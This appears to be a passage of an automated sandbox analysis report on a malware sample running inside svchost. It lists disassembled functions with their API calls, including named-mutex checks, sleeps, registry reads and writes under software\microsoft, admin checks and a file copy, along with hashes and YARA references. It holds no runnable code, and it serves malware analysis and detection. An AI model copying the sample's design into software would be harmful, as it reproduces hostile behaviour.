API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$VEFK
API String ID: 849374196-3911370694
Opcode ID: 2bb964fff12ace79f6092aca5d8212c51aacdabd31caea468f79838945aaa2c4
Instruction ID: 35cbe0b08f633fdc00e29a97d25bf8dc81d9d26503fe42c9778f2a928dea8327
Opcode Fuzzy Hash: 2bb964fff12ace79f6092aca5d8212c51aacdabd31caea468f79838945aaa2c4
Instruction Fuzzy Hash: 5101F932A817142BF3219BA0BC0EF6E73889F45B54F654505FD45A6380DFA4AC648ABA

Function 02D416E0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 56sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}), ref: 02D416FC
Sleep.KERNEL32(00000064), ref: 02D41712
OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}), ref: 02D41720
ReleaseMutex.KERNEL32(00000000), ref: 02D41729
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D41741
CloseHandle.KERNEL32(00000000), ref: 02D41753
PathAddBackslashA.SHLWAPI(02D7D4A8), ref: 02D4175E
Sleep.KERNEL32(00009C40,02D7D4A8,OFFSHORE), ref: 02D41778

Strings

OFFSHORE, xrefs: 02D41764
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}, xrefs: 02D416F0, 02D41714

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
String ID: Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}$OFFSHORE
API String ID: 849374196-3031696281
Opcode ID: d4468e53e676ae24a25e1f9c24ef353287acbfac9155a01e409c4c74129a11d2
Instruction ID: 922c886a19701f097d0173f910299a8a8f470d8cd1ee654aa57a9fb9f6a7356c
Opcode Fuzzy Hash: d4468e53e676ae24a25e1f9c24ef353287acbfac9155a01e409c4c74129a11d2
Instruction Fuzzy Hash: F7016D32AC07106BF31167A0BC4EF6A73989F44BA4F040514FD49A2380DFF8DC5486B5

Function 02D3B3F0 Relevance: 17.5, APIs: 7, Strings: 3, Instructions: 41sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02D3B41C
ReleaseMutex.KERNEL32(00000000), ref: 02D3B425
GetHandleInformation.KERNEL32(00000000,?), ref: 02D3B439
CloseHandle.KERNEL32(00000000), ref: 02D3B44B
PathAddBackslashA.SHLWAPI(5e8dc0d9), ref: 02D3B456
Sleep.KERNEL32(00009C40,5e8dc0d9,ALPHA), ref: 02D3B470
Sleep.KERNEL32(00000064), ref: 02D3B476

Strings

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}, xrefs: 02D3B410
5e8dc0d9, xrefs: 02D3B451, 02D3B461
ALPHA, xrefs: 02D3B45C

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
String ID: 5e8dc0d9$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
API String ID: 4280258085-3416370051
Opcode ID: 52e773caa5307cd1b212cc8eeeb3c81013b140734761813188db9b7391adb7c7
Instruction ID: 57a21cc2e7593e11aeee8599656d1eb31c76c373548bed58df391f9ecf2bc474
Opcode Fuzzy Hash: 52e773caa5307cd1b212cc8eeeb3c81013b140734761813188db9b7391adb7c7
Instruction Fuzzy Hash: B0F0F431A887046AE2026B61FC0EF5A3798AF19A2CF504916F58691380DBF4ED10C6BA

Function 02D3F990 Relevance: 17.5, APIs: 7, Strings: 3, Instructions: 41sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D3F9BC
ReleaseMutex.KERNEL32(00000000), ref: 02D3F9C5
GetHandleInformation.KERNEL32(00000000,?), ref: 02D3F9D9
CloseHandle.KERNEL32(00000000), ref: 02D3F9EB
PathAddBackslashA.SHLWAPI(5e8dc163), ref: 02D3F9F6
Sleep.KERNEL32(00009C40,5e8dc163,HANDY), ref: 02D3FA10
Sleep.KERNEL32(00000064), ref: 02D3FA16

Strings

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D3F9B0
5e8dc163, xrefs: 02D3F9F1, 02D3FA01
HANDY, xrefs: 02D3F9FC

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
String ID: 5e8dc163$HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
API String ID: 4280258085-1532886009
Opcode ID: 81ff6722ef74eab8a1cfb917605c401724ae417c146f2a6ee9f642da470c5fd9
Instruction ID: f6e172d242815f3bce2b1f093b963b4f884caff9a32d17f9c6559e001abcdea2
Opcode Fuzzy Hash: 81ff6722ef74eab8a1cfb917605c401724ae417c146f2a6ee9f642da470c5fd9
Instruction Fuzzy Hash: 44F0F432EC83097EE20267A0EC0EF5E73986F05B04F550604F982A1390DBF49D54CAB6

Function 02D42ED0 Relevance: 17.5, APIs: 7, Strings: 3, Instructions: 41sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D42EFC
ReleaseMutex.KERNEL32(00000000), ref: 02D42F05
GetHandleInformation.KERNEL32(00000000,?), ref: 02D42F19
CloseHandle.KERNEL32(00000000), ref: 02D42F2B
PathAddBackslashA.SHLWAPI(5E8DC473), ref: 02D42F36
Sleep.KERNEL32(00009C40,5E8DC473,RFK), ref: 02D42F50
Sleep.KERNEL32(00000064), ref: 02D42F56

Strings

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D42EF0
RFK, xrefs: 02D42F3C
5E8DC473, xrefs: 02D42F31, 02D42F41

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
String ID: 5E8DC473$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$RFK
API String ID: 4280258085-3548839560
Opcode ID: 948506a9490ee5adac6cb45ce3970e6c195692afcfd90a991d54469951f913d8
Instruction ID: 514bddd20128624547ee06a3a1cb82b8e4b361019ebb228d2abf2e3a31bfcd53
Opcode Fuzzy Hash: 948506a9490ee5adac6cb45ce3970e6c195692afcfd90a991d54469951f913d8
Instruction Fuzzy Hash: A9F0F4319C83117BF2106BA1AC0DF1F37986F04B04F910514FA86A23C1DFE4AD54C6B6

Function 00402E40 Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 00402E47
GetProcessHeap.KERNEL32(00000000,?,.5@,753CE610,00402E2E), ref: 00402E5F
HeapValidate.KERNEL32(00000000), ref: 00402E62
GetProcessHeap.KERNEL32(00000000,?), ref: 00402E6F
HeapFree.KERNEL32(00000000), ref: 00402E72
GetProcessHeap.KERNEL32(00000000,.5@,.5@,753CE610,00402E2E), ref: 00402E7B
HeapValidate.KERNEL32(00000000), ref: 00402E7E
GetProcessHeap.KERNEL32(00000000,.5@), ref: 00402E8B
HeapFree.KERNEL32(00000000), ref: 00402E8E

Strings

.5@, xrefs: 00402E54, 00402E78, 00402E88

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Validate$String
String ID: .5@
API String ID: 2629017576-427766238
Opcode ID: 68846457a1a63d72fa89529ead8f04e900e348e70f49c4da8581cfeb29d1e508
Instruction ID: 8a0f41a42cc1d9b8d1979a4e7edab232083dfb301258e97597ac6d2db269471b
Opcode Fuzzy Hash: 68846457a1a63d72fa89529ead8f04e900e348e70f49c4da8581cfeb29d1e508
Instruction Fuzzy Hash: 10F0FEB2641211ABE6106BB59E4CF5B3A5CEF95B56F044525B708F71D0CA74CC0086B8

Function 02D3C688 Relevance: 17.5, APIs: 7, Strings: 3, Instructions: 34sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 02D3C69C
ReleaseMutex.KERNEL32(00000000), ref: 02D3C6A9
GetHandleInformation.KERNEL32(00000000,?), ref: 02D3C6BD
CloseHandle.KERNEL32(00000000), ref: 02D3C6CF
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D3C6DE
PathAddBackslashA.SHLWAPI(5E8DC08D), ref: 02D3C6E5
Sleep.KERNEL32(00009C40,5E8DC08D,BSS), ref: 02D3C6FF
Sleep.KERNEL32(00000064), ref: 02D3C705

Strings

5E8DC08D, xrefs: 02D3C6E0, 02D3C6F0
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}, xrefs: 02D3C690
BSS, xrefs: 02D3C6EB

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
String ID: 5E8DC08D$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
API String ID: 3206501308-1397768872
Opcode ID: d05e08324df802dc2968aabfc71b34583617bce7ab990dafa5305923bf3e1964
Instruction ID: c094514477c8075bcf4dc840062da6762ad3d4db7126122cceeee3df31fd2d4f
Opcode Fuzzy Hash: d05e08324df802dc2968aabfc71b34583617bce7ab990dafa5305923bf3e1964
Instruction Fuzzy Hash: 25F096309D9351AFE3226B60EC0DF1E37546F09B59F104905F846B1380DBB89C18CB76

Function 02D28EC0 Relevance: 16.6, APIs: 11, Instructions: 120filesynchronizationmemoryCOMMON

Download Yara Rule

APIs

SetThreadDesktop.USER32(?,74DF3050,74DF30D0,74DF3080), ref: 02D28F00
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D28F14
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D28F1F
UnmapViewOfFile.KERNEL32(00000000,?,00000006,00000000), ref: 02D28F47
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D28F64
CloseHandle.KERNEL32(00000000), ref: 02D28F75
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02D6F54C), ref: 02D28F95
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02D28FAC
HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D28FEC
ReleaseMutex.KERNEL32(00000000,0000007E,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02D29034
ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02D2903D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: File$HandleMutexObjectReleaseSingleViewWait$CloseCreateDesktopFreeHeapInformationMappingThreadUnmap
String ID:
API String ID: 2125184990-0
Opcode ID: 3f46bb8686d60f756fe6e837ffb4280045336b6aed0b1bf777374581b98bbb7a
Instruction ID: 3a5e51b4a92443aa8cea07cf3297eb3b4c15c19024309cef5b2b2aa408028efb
Opcode Fuzzy Hash: 3f46bb8686d60f756fe6e837ffb4280045336b6aed0b1bf777374581b98bbb7a
Instruction Fuzzy Hash: 3941EE76A80350ABD710DF64ED68FA637A9EB58314F244E04FA51873C0D7B5AC68CB70

Function 02D2F120 Relevance: 16.5, APIs: 13, Instructions: 218memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,-05ADF5C8,00000000,00000000,?,?,?,?), ref: 02D2F164
HeapAlloc.KERNEL32(00000000), ref: 02D2F16B
memset.MSVCRT ref: 02D2F17B
memcpy.MSVCRT ref: 02D2F186
GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,02D6573C,?,02D65CF4,-05ADF5C8,00000000,00000000,?), ref: 02D2F24E
HeapValidate.KERNEL32(00000000), ref: 02D2F255
GetProcessHeap.KERNEL32(?,00000000), ref: 02D2F261
HeapFree.KERNEL32(00000000), ref: 02D2F268
memcpy.MSVCRT ref: 02D2F28E
GetProcessHeap.KERNEL32(00000000,00000000,-05ADF5C8,00000000,00000000,?,?,?,?), ref: 02D2F2BA
HeapValidate.KERNEL32(00000000), ref: 02D2F2BD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D2F2CA
HeapFree.KERNEL32(00000000), ref: 02D2F2CD

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidatememcpy$Allocmemset
String ID:
API String ID: 1948005343-0
Opcode ID: 85d4cae9df58d08f3a31e147c318d62ac32d3fee695defba96b043033785ede1
Instruction ID: db9233a72f86a686580525f5df91f21f0c726a8153767ee49fb8e03fc71805c3
Opcode Fuzzy Hash: 85d4cae9df58d08f3a31e147c318d62ac32d3fee695defba96b043033785ede1
Instruction Fuzzy Hash: F461E376A002299FDB11CF58D884AAAB7B9EF99728F048A5AFD04D7340D731DC55CBE0

Function 02D34330 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 125registrymemoryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D3433A
memset.MSVCRT ref: 02D34370
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02D34397
RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02D343BA
GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02D3442D
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02D34434
memset.MSVCRT ref: 02D34444
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 02D34472

Strings

software\microsoft, xrefs: 02D3438D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heapmemset$AdminAllocCloseOpenProcessQueryUserValue
String ID: software\microsoft
API String ID: 1484339481-3673152959
Opcode ID: 1dd5e30a9ddec87c0bf64b3902cd233d6e9ba1cd23c74e80e9e9f6562210fb31
Instruction ID: 0a8c579ed04811f5cbc20eb339e172c3e991d69b9a2b5702c0d30ac5ff7559e6
Opcode Fuzzy Hash: 1dd5e30a9ddec87c0bf64b3902cd233d6e9ba1cd23c74e80e9e9f6562210fb31
Instruction Fuzzy Hash: 4D41E832900159ABCB22CB64DC18FDABBB8DF85B14F1541A4ED84A7300D774DE49CBB1

Function 02D27880 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 124registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D278B3
memset.MSVCRT ref: 02D278CB
RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,?,?,?,?,?,?,74DEF380), ref: 02D278EC
RegQueryValueExA.ADVAPI32(?,00000104,00000000,00000001,?,00000104,?,?,?,?,?,74DEF380), ref: 02D27912
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,74DEF380), ref: 02D2799D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,74DEF380), ref: 02D279A4
memset.MSVCRT ref: 02D279B3
RegCloseKey.ADVAPI32(?,?,?,?,?,?,74DEF380), ref: 02D279E3

Strings

software\microsoft, xrefs: 02D278E0

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: memset$Heap$AllocCloseOpenProcessQueryValue
String ID: software\microsoft
API String ID: 4158279268-3673152959
Opcode ID: cd01792dac721b609607b6b36e7df20469053fe9315871e884f2e2cc30fd1496
Instruction ID: 55068a56a48e21865960c6178bb42d1c821bbc689239f9caf38129cc6e790012
Opcode Fuzzy Hash: cd01792dac721b609607b6b36e7df20469053fe9315871e884f2e2cc30fd1496
Instruction Fuzzy Hash: 65410B7194026D6FEB24DB649C98AEEB7ADEF5D308F4045A9E545E3340D3708E898BB0

Function 02D27BA0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D27BC2
memset.MSVCRT ref: 02D27BE0
RegOpenKeyExA.ADVAPI32(02D35889,software\microsoft,00000000,00000102,80000002,?,?,?,?,00000000,0000000A), ref: 02D27C7D
RegSetValueExA.ADVAPI32(80000002,a1633cfca,00000000,00000001,?,00000104,?,?,?,?,00000000,0000000A), ref: 02D27C9F
RegDeleteValueA.ADVAPI32(80000002,a1633cfca,?,?,?,?,00000000,0000000A), ref: 02D27CAC
RegFlushKey.ADVAPI32(80000002,?,?,?,?,00000000,0000000A), ref: 02D27CBA
RegCloseKey.ADVAPI32(80000002,?,?,?,?,00000000,0000000A), ref: 02D27CCF

Strings

a1633cfca, xrefs: 02D27C9D, 02D27CAA
software\microsoft, xrefs: 02D27C77

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Valuememset$CloseDeleteFlushOpen
String ID: a1633cfca$software\microsoft
API String ID: 3377232977-698140376
Opcode ID: 747ece956105b7365b254da6cb535cae4ec8790a3a9056be3a326e98edcaff97
Instruction ID: 9c0755eee46add208bb08971a7b16765036e55079210f15de74ae6cf8c64b590
Opcode Fuzzy Hash: 747ece956105b7365b254da6cb535cae4ec8790a3a9056be3a326e98edcaff97
Instruction Fuzzy Hash: E9310971940168ABFB30DB749898BEEB7B8EB24308F5055ACE185D7340D2708EC8DFA0

Function 02D3F098 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 89filesynchronizationsleepCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(02D7DCB0,02D7DBA8,00000000), ref: 02D3F0D9
CopyFileA.KERNEL32(02D7DCB0,02D7DBA8,00000000), ref: 02D3F153
CreateMutexA.KERNEL32(00000000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02D3F15E
Sleep.KERNEL32(000003E8), ref: 02D3F16F
ReleaseMutex.KERNEL32(00000000), ref: 02D3F176
GetHandleInformation.KERNEL32(00000000,?), ref: 02D3F188
CloseHandle.KERNEL32(00000000), ref: 02D3F199

Strings

sign.cer, xrefs: 02D3F0FE
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}, xrefs: 02D3F155

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CopyFileHandleMutex$CloseCreateInformationReleaseSleep
String ID: Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$sign.cer
API String ID: 2434762175-3941987283
Opcode ID: 14c512004fee38f4c1a379c41ea71f36c6fcd30c8d0323eb852914031d71a784
Instruction ID: 26d03ca34e3813bec5c6f32a0c65070e3941cbb60f63c3d1339923a287844e7b
Opcode Fuzzy Hash: 14c512004fee38f4c1a379c41ea71f36c6fcd30c8d0323eb852914031d71a784
Instruction Fuzzy Hash: BF31D5309447885FE7139F28E468B977FE1AF56740F298095E8C99B712E774CC04C7A0

Function 02D39B00 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D39B08
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02D39CC7), ref: 02D39B3F
RegQueryValueExA.ADVAPI32(02D39CC7,a1633fdda,00000000,?,00000000,?), ref: 02D39B5C
RegCloseKey.ADVAPI32(02D39CC7), ref: 02D39B66
RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 02D39B99
RegQueryValueExA.ADVAPI32(?,a1633fdda,00000000,?,00000000,?), ref: 02D39BB6
RegCloseKey.ADVAPI32(?), ref: 02D39BC0

Strings

a1633fdda, xrefs: 02D39B56, 02D39BB0
software\microsoft, xrefs: 02D39B28, 02D39B82

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue$AdminUser
String ID: a1633fdda$software\microsoft
API String ID: 2113243795-4110729799
Opcode ID: af90f51b533d31605f680ed328bcacbba50c348af7ef2839e5e56fb9bc879475
Instruction ID: 883fcd19b5e1d1a4071a642f6fdb7da74f6fe0d87b01c6ede8d292d9626695e0
Opcode Fuzzy Hash: af90f51b533d31605f680ed328bcacbba50c348af7ef2839e5e56fb9bc879475
Instruction Fuzzy Hash: B5213375E40209FBEB00DBA4DC99FEEBBB8EF48704F504599E501E6240E7B4AA45CF90

Function 02D23600 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D23608
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02D35686), ref: 02D2363F
RegQueryValueExA.ADVAPI32(02D35686,a1633e4fa,00000000,?,00000000,?), ref: 02D2365C
RegCloseKey.ADVAPI32(02D35686), ref: 02D23666
RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 02D23699
RegQueryValueExA.ADVAPI32(?,a1633e4fa,00000000,?,00000000,?), ref: 02D236B6
RegCloseKey.ADVAPI32(?), ref: 02D236C0

Strings

a1633e4fa, xrefs: 02D23656, 02D236B0
software\microsoft, xrefs: 02D23628, 02D23682

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue$AdminUser
String ID: a1633e4fa$software\microsoft
API String ID: 2113243795-77370241
Opcode ID: a367ef1daa22608c680cf8c04b1c0ae45f0b6e77a4858b27bce6c487c0cd8e0f
Instruction ID: cc00a0cbd241b432885b748d337003432f01014fe78ac6479091a1882a5b7b59
Opcode Fuzzy Hash: a367ef1daa22608c680cf8c04b1c0ae45f0b6e77a4858b27bce6c487c0cd8e0f
Instruction Fuzzy Hash: D1215375E40219FBEB00DBA4DC99FFEBBB8EF48705F504559E501E6240E7B4AA44CBA0

Function 02D3F9A8 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 30sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D3F9BC
ReleaseMutex.KERNEL32(00000000), ref: 02D3F9C5
GetHandleInformation.KERNEL32(00000000,?), ref: 02D3F9D9
CloseHandle.KERNEL32(00000000), ref: 02D3F9EB
PathAddBackslashA.SHLWAPI(5e8dc163), ref: 02D3F9F6
Sleep.KERNEL32(00009C40,5e8dc163,HANDY), ref: 02D3FA10
Sleep.KERNEL32(00000064), ref: 02D3FA16

Strings

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D3F9B0
5e8dc163, xrefs: 02D3F9F1, 02D3FA01
HANDY, xrefs: 02D3F9FC

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
String ID: 5e8dc163$HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
API String ID: 4280258085-1532886009
Opcode ID: 2c059c74de555c74218079cb60cd362dacb5b771e5340c2ba9fd785a18b8c820
Instruction ID: 25f0f7e772ba6d62ce9f948805ade5bdafc1e23e75fe50b3d6b89bea1313d81b
Opcode Fuzzy Hash: 2c059c74de555c74218079cb60cd362dacb5b771e5340c2ba9fd785a18b8c820
Instruction Fuzzy Hash: 95F08232E883157EE3226B60EC0EB5E77946F06B49F144504F986A1340DBF88C588BB2

Function 02D42EE8 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 30sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D42EFC
ReleaseMutex.KERNEL32(00000000), ref: 02D42F05
